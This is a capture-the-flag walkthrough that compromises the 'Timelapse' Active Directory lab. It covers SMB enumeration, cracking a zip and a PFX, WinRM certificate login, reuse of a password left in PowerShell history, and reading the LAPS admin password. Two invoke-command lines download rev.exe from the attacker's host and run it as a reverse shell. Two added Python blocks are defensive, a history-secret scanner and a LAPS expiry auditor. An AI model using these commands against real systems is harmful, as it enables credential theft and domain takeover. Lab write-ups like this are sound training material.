IP -> 10.10.11.152
We start by running nmap.
$ nmap -p- -v -sCV -Pn 10.10.11.152
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-04-01 04:27:04Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5986/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
| tls-alpn:
|_ http/1.1
| ssl-cert: Subject: commonName=dc01.timelapse.htb
| Issuer: commonName=dc01.timelapse.htb
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2021-10-25T14:05:29
| Not valid after: 2022-10-25T14:25:29
| MD5: e233 a199 4504 0859 013f b9c5 e4f6 91c3
|_SHA-1: 5861 acf7 76b8 703f d01e e25d fc7c 9952 a447 7652
|_ssl-date: 2022-04-01T04:28:34+00:00; +8h00m00s from scanner time.
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49673/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49674/tcp open msrpc Microsoft Windows RPC
49696/tcp open msrpc Microsoft Windows RPC
50357/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2022-04-01T04:27:56
|_ start_date: N/A
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
|_clock-skew: mean: 7h59m59s, deviation: 0s, median: 7h59m59s
We see several services that point to an Active Directory environment, namely Kerberos and LDAP. SMB is also running, so let’s list the shares.
$ smbclient -N -L //10.10.11.152/
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
Shares Disk
SYSVOL Disk Logon server share
SMB1 disabled -- no workgroup available
The share “Shares” caught my attention. Let’s inspect further.
$ smbclient -N //10.10.11.152/Shares
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Mon Oct 25 16:39:15 2021
.. D 0 Mon Oct 25 16:39:15 2021
Dev D 0 Mon Oct 25 20:40:06 2021
HelpDesk D 0 Mon Oct 25 16:48:42 2021
6367231 blocks of size 4096. 2392047 blocks available
smb: \>
We see two directories, Dev and HelpDesk. Let’s see their contents.
smb: \> dir Dev/
. D 0 Mon Oct 25 20:40:06 2021
.. D 0 Mon Oct 25 20:40:06 2021
winrm_backup.zip A 2611 Mon Oct 25 16:46:42 2021
6367231 blocks of size 4096. 2394141 blocks available
A backup! Let’s download it and inspect the other folder.
smb: \> dir HelpDesk/
. D 0 Mon Oct 25 16:48:42 2021
.. D 0 Mon Oct 25 16:48:42 2021
LAPS.x64.msi A 1118208 Mon Oct 25 15:57:50 2021
LAPS_Datasheet.docx A 104422 Mon Oct 25 15:57:46 2021
LAPS_OperationsGuide.docx A 641378 Mon Oct 25 15:57:40 2021
LAPS_TechnicalSpecification.docx A 72683 Mon Oct 25 15:57:44 2021
6367231 blocks of size 4096. 2394141 blocks available
LAPS (Microsoft’s Local Administrator Password Solution) manages and rotates the local administrator password of domain-joined machines and stores it in Active Directory, where only delegated principals are allowed to read it. Let’s download it all.
Now let’s unzip the winrm backup and see its contents.
$ unzip winrm_backup.zip
Archive: winrm_backup.zip
[winrm_backup.zip] legacyy_dev_auth.pfx password:
It seems to be password protected, so let’s generate a hash with zip2john and try to crack it with rockyou.txt.
$ zip2john winrm_backup.zip > winrm_backup.hash
Created directory: /home/javier/.john
ver 2.0 efh 5455 efh 7875 winrm_backup.zip/legacyy_dev_auth.pfx PKZIP Encr: 2b chk, TS_chk, cmplen=2405, decmplen=2555, crc=12EC5683
$ cat winrm_backup.hash
winrm_backup.zip/legacyy_dev_auth.pfx:$pkzip2$1*2*2*0*...
$ john --wordlist=/opt/Hacking/rockyou.txt winrm_backup.hash
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
supremelegacy (winrm_backup.zip/legacyy_dev_auth.pfx)
1g 0:00:00:00 DONE (2022-06-08 12:53) 1.123g/s 3902Kp/s 3902Kc/s 3902KC/s surfrox1391..supergau
Use the "--show" option to display all of the cracked passwords reliably
Session completed
We got the password! Now let’s unzip its contents.
$ unzip winrm_backup.zip
Archive: winrm_backup.zip
[winrm_backup.zip] legacyy_dev_auth.pfx password: supremelegacy
inflating: legacyy_dev_auth.pfx
$ ls
legacyy_dev_auth.pfx winrm_backup.zip
It contains a PFX file, which holds the certificate and private key used to log in through WinRM. The PFX itself is password protected, so let’s crack that password too!
$ pfx2john legacyy_dev_auth.pfx > legacyy_dev_auth.hash
$ cat legacyy_dev_auth.hash
legacyy_dev_auth.pfx:$pfxng$1$20$2000$20$eb755568327396de179c4a5d668ba8....
$ john --wordlist=/opt/Hacking/rockyou.txt legacyy_dev_auth.hash
Using default input encoding: UTF-8
Loaded 1 password hash (pfx [PKCS12 PBE (.pfx, .p12) (SHA-1 to SHA-512) 128/128 AVX 4x])
Cost 1 (iteration count) is 2000 for all loaded hashes
Cost 2 (mac-type [1:SHA1 224:SHA224 256:SHA256 384:SHA384 512:SHA512]) is 1 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
thuglegacy (legacyy_dev_auth.pfx)
1g 0:00:03:12 DONE (2022-06-08 13:03) 0.005195g/s 16787p/s 16787c/s 16787C/s thuglife03282006..thug209
Use the "--show" option to display all of the cracked passwords reliably
Session completed
We got the password! Time to extract the private key and the certificate!
$ openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out priv-key.key -nodes
Enter Import Password: thuglegacy
$ cat priv-key.key
Bag Attributes
Microsoft Local Key set: <No Values>
localKeyID: 01 00 00 00
friendlyName: te-4a...
$ openssl pkcs12 -in legacyy_dev_auth.pfx -nokeys -out certificate.crt
Enter Import Password: thuglegacy
$ cat certificate.crt
Bag Attributes
localKeyID: 01 00 00 00
subject=CN = Legacyy...
Now that we have extracted the certificate and key, I will try to log in using evil-winrm. Since this is a domain controller we need name resolution for the domain first, so let’s go back to our nmap scan, take the hostname from the certificate and add it to the /etc/hosts file.
10.10.11.152 dc01.timelapse.htb timelapse.htb
$ evil-winrm -S -c certificate.crt -k priv-key.key -i dc01.timelapse.htb
Evil-WinRM shell v3.3
Warning: SSL enabled
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\legacyy\Documents> whoami
timelapse\legacyy
Great! We are now inside the domain controller as the user legacyy. We found and downloaded the LAPS folder earlier, so let’s check whether our current user has permission to read LAPS credentials.
*Evil-WinRM* PS C:\Users\legacyy\Documents> whoami /all
USER INFORMATION
----------------
User Name SID
================= ============================================
timelapse\legacyy S-1-5-21-671920749-559770252-3318990721-1603
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
=========================================== ================ ============================================ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
TIMELAPSE\Development Group S-1-5-21-671920749-559770252-3318990721-3101 Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity Well-known group S-1-18-1 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label S-1-16-8448
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
USER CLAIMS INFORMATION
-----------------------
User claims unknown.
Kerberos support for Dynamic Access Control on this device has been disabled.
None of these groups grant LAPS access, so it looks like we can’t read the managed passwords. Let’s read this user’s past command history.
*Evil-WinRM* PS C:\Users\legacyy> cd "C:/Users/legacyy/AppData/Roaming/Microsoft/Windows/PowerShell/PSReadLine/"
*Evil-WinRM* PS C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine> dir
Directory: C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 3/3/2022 11:46 PM 434 ConsoleHost_history.txt
*Evil-WinRM* PS C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine> type "C:/Users/legacyy/AppData/Roaming/Microsoft/Windows/PowerShell/PSReadLine/ConsoleHost_history.txt"
whoami
ipconfig /all
netstat -ano |select-string LIST
$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
$p = ConvertTo-SecureString 'E3R$Q62^12p7PLlC%KWaxuaV' -AsPlainText -Force
$c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock {whoami}
get-aduser -filter * -properties *
exit
We can see that our user wasn’t careful with their history! We got credentials for the user svc_deploy. Let’s try rerunning the same commands and see what we get.
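Plaintext credentials in ConsoleHost_history.txt are exactly what a blue team should be sweeping user profiles for. The following scanner is an added example, not part of the original writeup: it runs over a constructed history modelled on the one above (the secrets in it are made-up placeholders), reports where a secret was typed without ever storing the secret itself, and produces a redacted copy that can safely be attached to an incident ticket.

```python
import re

# Constructed sample of a PSReadLine ConsoleHost_history.txt, modelled on the
# one found on the box; the secrets below are made-up placeholders.
SAMPLE_HISTORY = """whoami
ipconfig /all
$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
$p = ConvertTo-SecureString 'Placeholder-Passw0rd!' -AsPlainText -Force
$c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock {whoami}
net user backupadm Summer2022! /add
get-aduser -filter * -properties *
exit
"""

# Each pattern captures the secret in a group named "secret" (where the
# command carries one) so a single redaction routine can mask it.
PATTERNS = {
    "securestring_plaintext": re.compile(
        r"ConvertTo-SecureString\s+(?P<q>['\"])(?P<secret>.+?)(?P=q).*-AsPlainText", re.I),
    "net_user_add": re.compile(
        r"\bnet\s+user\s+(?P<user>\S+)\s+(?P<secret>\S+)\s+/add", re.I),
    "pscredential": re.compile(
        r"PSCredential\s*\(\s*['\"](?P<user>[^'\"]+)['\"]", re.I),
}

def scan_history(text):
    """One finding per (line, pattern) hit; only the secret's length is kept."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for kind, rx in PATTERNS.items():
            m = rx.search(line)
            if not m:
                continue
            gd = m.groupdict()
            findings.append({
                "line": lineno,
                "kind": kind,
                "user": gd.get("user"),
                "secret_len": len(gd["secret"]) if gd.get("secret") else None,
            })
    return findings

def redact_history(text):
    """Mask captured secrets so the history file can be shared safely."""
    out = []
    for line in text.splitlines():
        for rx in PATTERNS.values():
            m = rx.search(line)
            if m and m.groupdict().get("secret"):
                s, e = m.span("secret")
                line = line[:s] + "<REDACTED>" + line[e:]
        out.append(line)
    return "\n".join(out)
```

On a real host the same functions would be fed every `%APPDATA%\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt` under C:\Users.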
*Evil-WinRM* PS C:\Users\legacyy> $so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
*Evil-WinRM* PS C:\Users\legacyy> $p = ConvertTo-SecureString 'E3R$Q62^12p7PLlC%KWaxuaV' -AsPlainText -Force
*Evil-WinRM* PS C:\Users\legacyy> $c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
*Evil-WinRM* PS C:\Users\legacyy> invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock {whoami}
timelapse\svc_deploy
We see that it actually works! So let’s try and get a reverse shell on this user. I will use my own reverse shell for this one. https://github.com/CaraTortu/RevShell/releases/download/v1.0.0/hello_x64.exe.
We start a web server with python3 -m http.server hosting the file hello_x64.exe which I have renamed to rev.exe.
*Evil-WinRM* PS C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine> invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock {Invoke-WebRequest -Uri http://10.10.14.103:8000/rev.exe -Out rev.exe; .\rev.exe 10.10.14.103 1234}
And in our netcat listener we get the shell.
$ nc -lvnp 1234
Connection from 10.10.11.152:57689
$ whoami
timelapse\svc_deploy
Now let’s check if this user does have permission to manage LAPS credentials.
$ whoami /all
USER INFORMATION
----------------
User Name SID
==================== ============================================
timelapse\svc_deploy S-1-5-21-671920749-559770252-3318990721-3103
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
=========================================== ================ ============================================ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
TIMELAPSE\LAPS_Readers Group S-1-5-21-671920749-559770252-3318990721-2601 Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity Well-known group S-1-18-1 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label S-1-16-8448
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
USER CLAIMS INFORMATION
-----------------------
User claims unknown.
Kerberos support for Dynamic Access Control on this device has been disabled.
Yes! We are part of the LAPS_Readers group! Now we have to install the PowerShell LAPS scripts.
I downloaded https://github.com/ztrhgf/LAPS as a zip file and transferred it to the machine.
$ Expand-Archive -LiteralPath z.zip -DestinationPath .
$ Import-Module ./AdmPwd.PS/AdmPwd.PS.psd1
$ Get-ADComputer -Identity "DC01" -Server "dc01.timelapse.htb" -properties ms-mcs-admpwd,ms-mcs-admpwdexpirationtime | select-object ms-mcs-admpwd,ms-mcs-admpwdexpirationtime
ms-mcs-admpwd ms-mcs-admpwdexpirationtime
------------- ---------------------------
-Y%(XzP7....... 132995997519937170
We got the administrator password! Now let’s log in using evil-winrm again to get a reverse shell but this time with Administrator credentials.
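The second column, ms-Mcs-AdmPwdExpirationTime, is a Windows FILETIME (100-nanosecond ticks since 1601-01-01 UTC). Decoding it tells a defender whether LAPS is actually rotating the password on schedule and whether anyone has pushed the expiry past the policy maximum. This is an added example, not part of the original writeup; the reference time, the extra hosts and the 30-day policy window are constructed assumptions, and the DC01 value is the one shown above.

```python
from datetime import datetime, timedelta, timezone

FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)

def filetime_to_datetime(ft):
    """Convert a Windows FILETIME (100-ns ticks since 1601-01-01 UTC) to a datetime."""
    return FILETIME_EPOCH + timedelta(microseconds=int(ft) // 10)

def audit_laps_expiry(entries, now, max_age_days=30):
    """entries maps computer name -> ms-Mcs-AdmPwdExpirationTime.

    Flags 'expired' when the expiry is already in the past (LAPS failed to
    rotate the password) and 'beyond-policy' when the expiry lies further out
    than the configured maximum password age (misconfiguration or tampering).
    """
    report = {}
    for host, ft in entries.items():
        exp = filetime_to_datetime(ft)
        if exp < now:
            report[host] = "expired"
        elif exp > now + timedelta(days=max_age_days):
            report[host] = "beyond-policy"
        else:
            report[host] = "ok"
    return report

# Constructed inventory: DC01 carries the value returned by Get-ADComputer
# above; WS01 and WS02 are made-up hosts illustrating the two failure modes.
DAY_IN_TICKS = 86400 * 10_000_000
SAMPLE_ENTRIES = {
    "DC01": 132995997519937170,
    "WS01": 0,                                          # never set / far past
    "WS02": 132995997519937170 + 60 * DAY_IN_TICKS,     # 60 days out
}
# Constructed reference time close to the date of the john runs in the writeup.
NOW = datetime(2022, 6, 8, 13, 0, tzinfo=timezone.utc)

def run_sample():
    return audit_laps_expiry(SAMPLE_ENTRIES, NOW)

if __name__ == "__main__":
    print(filetime_to_datetime(SAMPLE_ENTRIES["DC01"]).isoformat())
    print(run_sample())
```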
*Evil-WinRM* PS C:\Users\legacyy> $so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
*Evil-WinRM* PS C:\Users\legacyy> $p = ConvertTo-SecureString '-Y%(XzP7x;y;A+Mp...' -AsPlainText -Force
*Evil-WinRM* PS C:\Users\legacyy> $c = New-Object System.Management.Automation.PSCredential ('administrator', $p)
*Evil-WinRM* PS C:\Users\legacyy> invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock {Invoke-WebRequest -Uri http://10.10.14.103:8000/rev.exe -Out rev.exe; .\rev.exe 10.10.14.103 1234}
And on our end:
$ nc -lvnp 1234
Connection from 10.10.11.152:64567
$ whoami
timelapse\administrator
$ type ../../TRX/Desktop/root.txt
f6420f241c8cd8181..
And we got the root flag!
I hope you enjoyed this writeup 🙂